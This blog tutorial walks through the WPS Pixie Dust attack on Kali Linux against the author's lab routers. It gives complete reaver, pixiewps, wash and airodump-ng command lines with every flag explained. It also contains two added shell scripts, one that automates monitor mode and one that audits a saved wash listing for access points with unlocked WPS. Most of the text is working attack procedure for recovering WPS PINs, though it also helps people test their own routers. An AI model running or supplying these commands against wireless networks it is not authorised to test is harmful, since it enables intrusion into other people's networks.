18 – WPS Offline Pixie Dust Attack

Hey everyone, it’s been a while since my last blog entry. I recently started playing around with the WPS offline Pixie Dust Attack, which I first mentioned back in May 2015, and wanted to document it. I have not had any success in exploiting a router vulnerable to this attack, but that doesn’t mean we can’t exploit it using the older reaver method, which I previously wrote about here and here. Please refer to my previous tutorial for some background on attacking WPS.
For this tutorial I am using Kali 2.0 “sana” in a VM, which has all the necessary tools required to perform this attack, so just get the latest ISO of Kali, update it fully and you will be good to follow along 🙂

I have two routers that are susceptible to the old method using reaver, so I used them again for this tutorial. Unfortunately this doesn’t work against them, but the process does, so it’s worthy of a blog entry!

First, as always, get your card into monitor mode. I actually came across a random issue that looks like a bug in Kali 2 “sana” when running airmon-ng:

“airmon-ng check kill” will kill anything that may be interfering with your card when in monitor mode
“airmon-ng start wlan0”, as you probably know by now, will place your card into monitor mode

1_Monitor_mode_Kali_Sana

As you can see, instead of a new interface called “mon0” being created we have “wlan0mon”, which does the same thing. I thought it was worth mentioning as it was a weird issue.

Checking with iwconfig will show you that monitor mode is actually enabled, so you don’t need to make any further changes:

“iwconfig” used below to make sure that the card is in monitor mode

2_iwconfig_monitor_mode_check

BUT sometimes I have also found that even though it says the card is in monitor mode, when you start airodump-ng sniffing the airwaves you actually see nothing, so you just have to put the interface down and set monitor mode manually on the card.

“ifconfig wlan0mon down” this will put the interface down
“iwconfig wlan0mon mode monitor” this will manually set monitor mode on the wireless interface
“ifconfig wlan0mon up” this will put the interface up again

3_Kali_sana_manual_monitor_mode_configuration

After you do this, if you run

“airodump-ng wlan0mon” to make sure you are sniffing the airwaves

You will see things are working as expected:

4_airodump-ng_output_after_manual_configuration

My lab routers for attacking are named “dlink” and “test” under the ESSID column above.
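The monitor-mode steps above (airmon-ng first, then the manual down/mode/up fallback when it doesn’t stick, verified with iwconfig) are easy to get wrong when you are retyping them every time, so here they are wrapped as one script. This is an added example, not code from the original post or from the aircrack-ng project; it assumes the Kali 2.0 “wlan0mon” naming from the post and the “Mode:Monitor” token that iwconfig prints, and the iwconfig parsing is kept in its own function so it can be checked against captured output without a wireless card.

```shell
#!/bin/sh
# Added example (not from the original post): the monitor-mode procedure
# above as one re-runnable script. Assumptions (mine): airmon-ng names the
# monitor interface "<phy>mon" as on Kali 2.0, and iwconfig reports the
# operating mode as "Mode:<Name>" on the interface's first line.

# Print the Mode that iwconfig reports for interface $1, reading iwconfig's
# text from stdin. Separated from the live commands so it can be tested.
iwconfig_mode() {
    awk -v ifn="$1" '
        $1 == ifn { found = 1 }                        # block for our interface
        found && match($0, /Mode:[A-Za-z-]+/) {        # first Mode: token after it
            print substr($0, RSTART + 5, RLENGTH - 5)  # strip the "Mode:" prefix
            exit
        }'
}

# Succeed (exit 0) only if the live iwconfig output says $1 is in monitor mode.
is_monitor() {
    [ "$(iwconfig "$1" 2>/dev/null | iwconfig_mode "$1")" = "Monitor" ]
}

# Put physical interface $1 (e.g. wlan0) into monitor mode following the post:
# airmon-ng, verify, and only if that did not take, the manual fallback.
ensure_monitor() {
    phy="$1"
    mon="${phy}mon"                   # Kali 2.0 naming: wlan0mon, not mon0
    airmon-ng check kill >/dev/null   # stop services that fight over the card
    airmon-ng start "$phy" >/dev/null
    if is_monitor "$mon"; then
        echo "$mon"
        return 0
    fi
    # airmon-ng said it worked but iwconfig disagrees: set it by hand.
    ifconfig "$mon" down
    iwconfig "$mon" mode monitor
    ifconfig "$mon" up
    if is_monitor "$mon"; then
        echo "$mon"
        return 0
    fi
    echo "could not put $mon into monitor mode" >&2
    return 1
}

# Usage (root, real card): MON=$(ensure_monitor wlan0) && airodump-ng "$MON"
```

The point of verifying with iwconfig after each step rather than trusting airmon-ng’s output is exactly the symptom described above: the tool reports success, but airodump-ng then sees nothing. Checking the reported mode before moving on turns that silent failure into an explicit one.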

Trying this attack against the access point labeled test first:

“reaver” runs reaver
“-i wlan0mon” specifies that you want to use the wlan0mon interface for this attack
“-b 2C:B0:5D:XX:XX:XX” is used to specify the MAC address of the access point you are targeting
“-vv” is used to display very verbose output
“-w” used to mimic a Windows 7 registrar
“-n” is used as this target access point always sends a NACK
“-S” is to only use small DH keys to improve the cracking speed
“-c 1” is used to specify the channel on which the access point resides

reaver -i wlan0mon -b 2C:B0:5D:XX:XX:XX -vv -w -n -S -c 1

5_reaver_pixiedust_attack_kali_2_sana

You may get different results with different access points, so make sure you look at the reaver and pixiewps man pages and try different switches! I already know this access point is not vulnerable, but just to show you what to do with this information, all you need to do is open up pixiewps and enter the following details you just enumerated in order to crack WPS on the target access point:

“pixiewps” runs pixiewps
“-e” Enrollee public key
“-s” Enrollee hash1
“-z” Enrollee hash2
“-a” Authentication session key
“-n” Enrollee nonce (mode 2,3,4)
“-S” Small Diffie-Hellman keys (PKr not needed)

pixiewps -e PKE -s E-Hash1 -z E-Hash2 -a AuthKey -n E-Nonce -S

6_pixiewps_kali_2_sana_pin

As you can see no WPS pin is found, but that just means my access point is not vulnerable to this offline attack method; it is however vulnerable to the online method, as can be seen in previous tutorials here and here.

Now I also have another access point to check, labeled “dlink” as you can see above, so let’s jump straight to it!

“reaver” to run reaver
“-i wlan0mon” will run on the interface of your wireless card
“-b 00:18:E7:XX:XX:XX” is to set the MAC address of the target access point
“-vv” runs in very verbose mode
“-w” is to mimic a Windows 7 registrar
“-n” as the target AP always sends a NACK
“-S” to use small DH keys to improve the crack speed
“-c 6” is to set the channel the access point is running on

reaver -i wlan0mon -b 00:18:E7:XX:XX:XX -vv -w -n -S -c 6

The PIN generated is incorrect, as the PIN on the router is neither of the PINs generated below, but it’s worth trying if the access point is either a D-Link or a Belkin: you may get lucky with the default PIN generator created by the devttys0 team, especially if your router is listed in the D-Link or Belkin posts showing how they were reversed in order to generate these WPS PINs.

7_Kali_sana_2_pixiewps_d-link_default_pin_generation

Another method

“reaver” to run reaver
“-i wlan0mon” will run on the interface of your wireless card
“-b 00:18:E7:XX:XX:XX” is to set the MAC address of the target access point
“-a” to auto detect the best advanced options for the target access point
“-vv” runs in very verbose mode
“-w” is to mimic a Windows 7 registrar
“-K 1” to run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek). Increment the value after -K.
“-n” as the target AP always sends a NACK
“-S” to use small DH keys to improve the crack speed
“-c 6” is to set the channel the access point is running on

reaver -i wlan0mon -b 00:18:E7:XX:XX:XX -a -vv -w -K 1 -n -S -c 6

8_Kali_sana_2_pixie_dust_reaver_WPS_PIN_method

Even though these methods aren’t working for me, it doesn’t mean they won’t work for you, so give them a try on your home router and see if you are vulnerable to this attack. The amount of time needed to crack a wireless network is greatly decreased if this method works, so it’s definitely worth trying.

Before I end this tutorial though, I just want to point you in the direction of some cool switches I discovered in the latest version of the aircrack-ng suite, which you can use for WPS enumeration.

“airodump-ng” to start airodump-ng sniffing the airwaves
“-i wlan0mon” to set the interface to sniff on
“-W” to display if the access point supports WPS
The first field of the WPS column indicates the version supported. The second field indicates the WPS config methods, of which there can be more than one, separated by a comma:
USB = USB method
ETHER = Ethernet
LAB = Label
DISP = Display
EXTNFC = External NFC
INTNFC = Internal NFC
NFCINTF = NFC Interface
PBC = Push Button
KPAD = Keypad
“Locked” is displayed when the AP setup is locked.
“-M” to display the manufacturer from the IEEE OUI list

airodump-ng -i wlan0mon -W -M

9_Kali_sana_airodump-ng_WPS_enumeration

Wash now also has a cool feature to enumerate some more information from your router:

“wash” to run wash
“-i wlan0mon” to run on the interface of your wireless card
“-g” to pipe output and run reaver alongside wash to get the chipset
“-c 1” specifies the channel you wish to run on

wash -i wlan0mon -g -c 1

10_Kali_sana_wash_enumeration

It’s handy for checking if the access point is locked out quickly before trying the reaver or Pixie Dust Attack.
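Both the airodump-ng -W column and the wash listing above answer the same question for a defender: which of my own access points still advertise WPS, and are they locked? Rather than eyeballing the table, the listing can be saved and turned into a verdict per AP. The script below is an added example, not code from the original post or from the reaver/wash or aircrack-ng projects; its input layout is my assumption modelled on the wash columns in the post (BSSID, Channel, RSSI, WPS Version, WPS Locked, ESSID), the sample listing is constructed, and the two XX-masked BSSIDs are the placeholders already used in the post.

```shell
#!/bin/sh
# Added example (not from the original post or the wash project): audit a
# saved wash listing of your own access points. Assumed column layout (mine,
# modelled on the wash output in the post):
#   BSSID  Channel  RSSI  WPS Version  WPS Locked  ESSID
# Capture one with:  wash -i wlan0mon -c 1 | tee wash.txt

# Constructed sample listing (not real captured data); the XX-masked BSSIDs
# are the placeholders from the post, the third row is made up.
SAMPLE_WASH='BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
2C:B0:5D:XX:XX:XX      1             -52        1.0               No                test
00:18:E7:XX:XX:XX      6             -45        1.0               No                dlink
AA:BB:CC:DD:EE:FF      11            -70        1.0               Yes               guest net'

# Print one "BSSID<TAB>ESSID<TAB>verdict" line per AP row read from stdin.
wps_audit() {
    awk '
        /^BSSID/ || /^-+$/ || NF < 6 { next }        # header, separator, blanks
        {
            bssid = $1
            locked = toupper($5)
            essid = $6                               # ESSIDs may contain spaces
            for (i = 7; i <= NF; i++) essid = essid " " $i
            if (locked == "NO")
                verdict = "WPS enabled and unlocked: disable WPS in the router admin UI"
            else if (locked == "YES")
                verdict = "WPS enabled but currently locked: still worth disabling"
            else
                verdict = "WPS state unknown (" $5 ")"
            printf "%s\t%s\t%s\n", bssid, essid, verdict
        }'
}

# Number of APs in the listing on stdin that are unlocked; useful as a
# one-number check from cron (anything above 0 needs attention).
count_unlocked() {
    wps_audit | awk -F'\t' '$3 ~ /unlocked/ { n++ } END { print n + 0 }'
}

# Usage on a saved capture:   wps_audit < wash.txt
# Usage on the sample above:  printf '%s\n' "$SAMPLE_WASH" | wps_audit
```

A "locked" result only means the AP has temporarily stopped answering PIN attempts after too many failures; the setting is still on and the lockout clears, which is why the second verdict still recommends turning WPS off rather than treating the lock as a fix.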

That’s it for now. Attacking WPS has come a long way in a short period of time, and it’s only a matter of time until this is a simple procedure that works in a matter of seconds to minutes, once enough PIN generation algorithms are reversed and added to make this much simpler than WEP to crack. You remember how easy WEP was to crack, right? It’s like traveling back in time to 2005 all over again.